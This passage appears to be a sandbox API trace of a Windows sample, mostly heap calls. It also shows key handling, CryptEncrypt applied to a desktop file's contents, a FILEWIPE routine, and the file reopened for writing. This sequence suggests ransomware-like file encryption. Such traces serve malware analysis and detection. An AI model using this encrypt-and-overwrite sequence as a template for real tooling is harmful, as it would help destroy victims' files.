Flags=0x0, Size=0x10) returned 0x88c898 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0029.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0029.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0029.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0029.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0029.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0029.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0029.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0029.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0029.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0029.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0029.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0029.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0029.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0029.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0029.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0029.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0029.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0029.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0029.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0029.765] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0029.765] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3e8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3e8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0029.765] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.765] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.765] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.765] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.765] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.765] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.765] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.765] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.765] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0029.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.765] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.765] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.765] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.765] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.766] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.766] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.766] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.766] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0029.766] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0029.766] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.766] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x64b5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x64c0) returned 1 [0029.766] CharLowerBuffW (in: lpsz="byte[25793]", cchLength=0xb | out: lpsz="byte[25793]") returned 0xb [0029.767] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.767] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8c2e00*, pdwDataLen=0x6ae220*=0x64b5, dwBufLen=0x64c0 | out: pbData=0x8c2e00*, pdwDataLen=0x6ae220*=0x64c0) returned 1 [0029.767] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0029.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.767] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.767] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.769] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0029.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.769] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.769] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.769] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0029.769] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0029.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.769] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.770] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.770] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.770] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.770] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0029.770] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0029.770] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0029.770] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.770] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0029.770] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.770] FreeLibrary (hLibModule=0x754b0000) returned 1 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0029.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0029.772] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0029.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0029.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.773] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea155690, ftCreationTime.dwHighDateTime=0x1d5bf55, ftLastAccessTime.dwLowDateTime=0x647f3060, ftLastAccessTime.dwHighDateTime=0x1d5babd, ftLastWriteTime.dwLowDateTime=0x647f3060, ftLastWriteTime.dwHighDateTime=0x1d5babd, nFileSizeHigh=0x0, nFileSizeLow=0x64b5, dwReserved0=0x0, dwReserved1=0x777648, cFileName="aOaIGEPyFbLNzs8iTQgh.m4a", cAlternateFileName="AOAIGE~1.M4A")) returned 0x7c2100 [0029.773] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0029.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0029.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.773] CharLowerBuffW (in: lpsz="byte[25781]", cchLength=0xb | out: lpsz="byte[25781]") returned 0xb [0029.773] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0029.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.773] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0029.773] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0029.774] FreeLibrary (hLibModule=0x76b40000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.774] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0029.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.774] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0029.775] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.775] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aoaigepyfblnzs8itqgh.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0029.775] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0029.775] HeapFree (in: hHeap=0x770000, 